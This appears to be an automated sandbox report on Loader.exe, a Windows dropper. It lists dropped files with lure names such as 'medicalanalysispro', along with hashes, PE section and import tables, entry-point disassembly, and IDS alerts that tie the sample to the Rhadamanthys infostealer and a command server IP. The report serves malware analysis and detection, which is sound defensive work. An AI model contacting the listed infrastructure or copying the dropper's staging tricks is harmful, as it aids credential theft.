                                                                                                                                                                                                                                                                                                              SHA-512:83F00DDBC6548FE8BE49CDB2AABA22B606DC61B8D4B0400E4D35B73D748E3BBC19BE1705DEBF3B2C993C793ADA0441D3A4339925B93CB64496440C7EC6416534
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........X=.......\...... .......8...........J...0...sun.rt._sync_Inflations.....k.......8...........J...0...sun.rt._sync_Deflations.....e.......@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):154239
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9969082235627456
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:HE8gAlKJZNMaGFooU0Wf6cu4gH3efYmDuMieduvn3Oa:HE8BlKCaGF9Gf6cuDewmyye3Oa
                                                                                                                                                                                                                                                                                                              MD5:FC8A6506496F671C09F18E98E7A0A6D0
                                                                                                                                                                                                                                                                                                              SHA1:6A29746489F94EEFF8CA00E04BC6BED2542CA030
                                                                                                                                                                                                                                                                                                              SHA-256:C196CE2452FE376F2AD783B44B3CBC2F72E9457250E0DE4F95CDFB70440FD1E6
                                                                                                                                                                                                                                                                                                              SHA-512:F501D8FBFA32B994EE4C2E3D09E731674968131E4CEBE0860ED33F636F83548EFBA53E6650775AC5193DD3619E52E567EB4B99408CDDF82A9B65D708D3BA717B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........h%.Y................medicalanalysispro/PK........@%.Y($...Y...&..)...medicalanalysispro/medicalanalysispro.exe..|T..8>..n....@...."...$!.d.]...D..b..< ..5.%AA..H.u.Z.j..ZKmk....bB... ......V...........&......?~].;gf.9s.....U;...b..$....O... |..o.B..|u.^....E...=u...J7$.....z..V$..j..j..K..7.W.Z..8....d...o.....(..\=....F..s..4w_...?07...X.{h..Ue.).~...!.wF...c..q.d"....#.!.!.o,}.....QQ.}#..M.*....].I.......a..#.z......{/.p.(.5.<.J*.!B......$..p....i..3...^d.V..f.....[2....[J...2.6X.O..H.L..........c..%.u<..........0...!..>s.t..e.W*+l#.d......c..H;...J....t........<....u..i\.l9..N9.N.t...-....FKs.7.U.:...t..!.3`.....y...1Gl._.m....v........M..:vLS.[<./.v.......g6....F...W..| 0.).x#.R....}.....,...#^K.x.8...i..y%dv..b])..3!}~..i.R.....)..<#.:.:CZ...S:@...l.r...p........n.'%...I...W8..'.IN."N.}X5a...1..X%9...)w....RJ..4."......(8.pfv5X|.rZ..B...KX.,.."v;.....p....8)..V...|.m.s..._..)...3.....*..I....g.jj!D......-M.|'4EK........6#
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):206336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.174815206205745
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:/ahKyd2n31e5GWp1icKAArDZz4N9GhbkrNEk1ek/Wt5OGNMJA/T:/ahO2p0yN90QE8/Wt4ez7
                                                                                                                                                                                                                                                                                                              MD5:178A2A89CB76EFEA6DF50CC884991226
                                                                                                                                                                                                                                                                                                              SHA1:918B309AB3FF30BE807E073DF80596EFF5800CED
                                                                                                                                                                                                                                                                                                              SHA-256:357829B06C1C185E44EFA729DD8671487A43778A3BE1B6F46C7956F4D4CB49E2
                                                                                                                                                                                                                                                                                                              SHA-512:E72605C87BE8F7A2A0AEAC0AF61E7EF329EFFCB74C05C678692EA7A80F1086D1A4DD1217D6CDF463A12252D80062F052E8581EDDEA9BACD959BF620ACA01566A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):210944
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.515127884918461
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:YfZnhZnKQ8GhYLpx6psBoac5/pvla1QQC2mCOSvWOOCaQOPBjJ7YQueuVuCjost:GJhZ/8GhYupsBfc5/LaY4WpxQOUZUs
                                                                                                                                                                                                                                                                                                              MD5:E3788F3C734D86FD84DA15A119BF460A
                                                                                                                                                                                                                                                                                                              SHA1:F90D041773B5BE025AC52AB14E51463272BE653C
                                                                                                                                                                                                                                                                                                              SHA-256:0C354269280D806288B0ED1AE7455E5A3B83A584C58006F0DF3626F374C2C284
                                                                                                                                                                                                                                                                                                              SHA-512:009D0FE0F7C08708F0BD3788B006EB5E1064A9CEFE69DED378998BD5DA103B8DD09DB7730992030655609C92FA726B3858A76F252E1739589642E4043C35B53B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.715583967305762
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:DiF6v2imI36Op/tGZGfWxdyWHD0I53vLl7WVl8e04IpDlPjs:DGVY6ClGoWxXH75T1WVl83lLs
                                                                                                                                                                                                                                                                                                              MD5:ADB29E6B186DAA765DC750128649B63D
                                                                                                                                                                                                                                                                                                              SHA1:160CBDC4CB0AC2C142D361DF138C537AA7E708C9
                                                                                                                                                                                                                                                                                                              SHA-256:2F7F8FC05DC4FD0D5CDA501B47E4433357E887BBFED7292C028D99C73B52DC08
                                                                                                                                                                                                                                                                                                              SHA-512:B28ADCCCF0C33660FECD6F95F28F11F793DC9988582187617B4C113FB4E6FDAD4CF7694CD8C0300A477E63536456894D119741A940DDA09B7DF3FF0087A7EADA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):45
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9111711733157262
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                                                                                                                                              MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                                                                                                                                              SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                                                                                                                                              SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                                                                                                                                              SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................J2SE.
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 12:40:12 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2700
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6707458756863716
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8STdfTXdanRYrnvsYd/KRkdAoEuN0dAKR+/KR2eHynP:8SJ4SvEu1eHy
                                                                                                                                                                                                                                                                                                              MD5:CE453E67433580DF5C036C66C2C67D0E
                                                                                                                                                                                                                                                                                                              SHA1:256BF8044515BDB35E3615EF1E300F5F5F013418
                                                                                                                                                                                                                                                                                                              SHA-256:D234DB9D952DAAF0508056647467075247AEE783133018B321782458B800EB0B
                                                                                                                                                                                                                                                                                                              SHA-512:1D0609886819A1C8D11498E1F97F43B1B70608C5FE03C4C83C788F2769D1A01BA5F0DE4AFE4F4128EF71FB4F800F77E6B04E6F70B417E60CB743A8598DAD78BD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Wed Oct 4 12:34:48 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2792
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.754849194536135
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8dQG2dOyW+YusJ2JrnzTdRdiuNqdLXuHj0PkZy+7:8bVSlQuQuD0PkZy
                                                                                                                                                                                                                                                                                                              MD5:3367FCBE8B07852970C508FB8CDC88B5
                                                                                                                                                                                                                                                                                                              SHA1:68132C5DCE6303995FE94C1341F0744D3775D1B6
                                                                                                                                                                                                                                                                                                              SHA-256:64D6EB2F2925CB69704C1512F8BB8FF4B08123ACF4BED36256D6F2D06E9DB20B
                                                                                                                                                                                                                                                                                                              SHA-512:A9F661DB7AFAC33ED6FCE6B3BF1E135DEE7EEB65ABC866DCE651DA1CCAE580971DD2D2D9C03632B0DB6A56598BF32B6A9D8766CC3B45E4F1CC32FC9F94BFCFC8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2741
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.692616203873556
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8S7dBT6DpRYrnv3d/KRkdAoEuN0dAKR+/KR2egy8Ec:8SnhhEu1egyd
                                                                                                                                                                                                                                                                                                              MD5:C28021B6C0DA12B7779C8F4A749893E0
                                                                                                                                                                                                                                                                                                              SHA1:CC0E847B15BBB32AF63D10A81BE287AF63287B82
                                                                                                                                                                                                                                                                                                              SHA-256:FFD0BC4EDAA108EADA643BCFFBA93015424DB3DD739DCF3775E3EC4C05377697
                                                                                                                                                                                                                                                                                                              SHA-512:41F72EB71864BBF8EB2AD03CD71D4E41E820E805532382DB0BA01AB594D118A4F23FDF69B7431D93EDAD981E5B7C9F0A1F74DE4DBE1B960365CA6AE60805BA49
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9888
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.518734292216491
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4S0:PeegJUaJHEw9p
                                                                                                                                                                                                                                                                                                              MD5:DED7DB4E3FE9611FC0A6DFF6A7E3ED92
                                                                                                                                                                                                                                                                                                              SHA1:8E4E531B37350C8896A8A3E778D630B3860B3903
                                                                                                                                                                                                                                                                                                              SHA-256:F878E1809B23AD8A8975205CBEC2603CE764CE90FFF2EF96C55C8D15335DACB0
                                                                                                                                                                                                                                                                                                              SHA-512:F979E210EB64DA587BB856C0D560785C233DF5D5D3778AF765DBAD727701E3D8E9C34028B7BE20F3A8D1F4CFC95AAAF4D51C49E9FC025E8812089B88B54689A6
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99935888991876
                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                              File name:Loader.exe
                                                                                                                                                                                                                                                                                                              File size:96'490'794 bytes
                                                                                                                                                                                                                                                                                                              MD5:031bafff0a790efc6955a90dafc6d0e1
                                                                                                                                                                                                                                                                                                              SHA1:266b3e8d18b4440330cc857df33813c4be52545a
                                                                                                                                                                                                                                                                                                              SHA256:ee0d10d2321499903ad1b0105e27ed80cf19c595b8cd5ab2249e146d983c8495
                                                                                                                                                                                                                                                                                                              SHA512:68d7d8f0c09a436adad2edbf03c20fadf492a360cae88450476532758d6ef321b01c17f9b35d9392e1d628c1ee48a2ad24ff6b937a94fe2f41f482711d01b581
                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:B5W6hUQz6aNM02KbWuwxNtv8uXQK9JU+HZNpkSeqS5VexuxnhXtqeGdpgXt9sNSP:i6hUQzHPgxNtv8EJUavkSRmn5tqzAeSP
                                                                                                                                                                                                                                                                                                              TLSH:8828336AD7B11F4DE77ED234CA3A0167572E823BD29344FDA978419329D2A61F37800B
                                                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....
                                                                                                                                                                                                                                                                                                              Icon Hash:064646060e36f36d
                                                                                                                                                                                                                                                                                                              Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                              call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                                                                              call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                                                                              mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04FABh
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                                                                              mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              push 0040A264h
                                                                                                                                                                                                                                                                                                              call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                              push 0040A24Ch
                                                                                                                                                                                                                                                                                                              push 00476AA0h
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04C8Dh
                                                                                                                                                                                                                                                                                                              call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                                                                              mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                              call 00007FCD70D04C7Bh
                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                              call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                              cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                              mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                                                                              jne 00007FCD70D0257Ah
                                                                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                                                                              pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FCD70D04951h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FCD70D02603h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FCD70D0257Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x160000 | 0x14198 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0xe1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x160000 | 0x14198 | 0x14200 | 3552ada5c68b4147d7b2340ddc0557de | False | 0.8465523097826086 | data | 7.35698438612207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x175000 | 0xfd6 | 0x1000 | d05a26f0a12f7e957e3aee878f20f7c4 | False | 0.995849609375 | data | 7.803317990396717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x160328 | 0xb844 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.986962604935131
RT_ICON | 0x16bb70 | 0x3512 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9730605034594435
RT_ICON | 0x16f088 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4288381742738589
RT_ICON | 0x171630 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.49835834896810505
RT_ICON | 0x1726d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.6967509025270758
RT_ICON | 0x172f80 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.3426829268292683
RT_ICON | 0x1735e8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.4314516129032258
RT_DIALOG | 0x1738d0 | 0x202 | data | English | United States | 0.4085603112840467
RT_DIALOG | 0x173ad8 | 0xf8 | data | English | United States | 0.6290322580645161
RT_DIALOG | 0x173bd0 | 0xa0 | data | English | United States | 0.60625
RT_DIALOG | 0x173c70 | 0xee | data | English | United States | 0.6260504201680672
RT_GROUP_ICON | 0x173d60 | 0x68 | data | English | United States | 0.75
RT_VERSION | 0x173dc8 | 0x1ac | data | | | 0.5257009345794392
RT_MANIFEST | 0x173f78 | 0x21f | XML 1.0 document, ASCII text, with very long lines (543), with no line terminators | English | United States | 0.578268876611418
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T23:54:30.170802+0100 | 2854802 | ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert | 1 | 104.37.175.218 | 7982 | 192.168.2.5 | 49859 | TCP
2024-12-22T23:54:57.147487+0100 | 2854802 | ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert | 1 | 104.37.175.218 | 7982 | 192.168.2.5 | 49929 | TCP
2024-12-22T23:54:57.147487+0100 | 2854824 | ETPRO JA3 HASH Suspected Malware Related Response | 2 | 104.37.175.218 | 7982 | 192.168.2.5 | 49929 | TCP
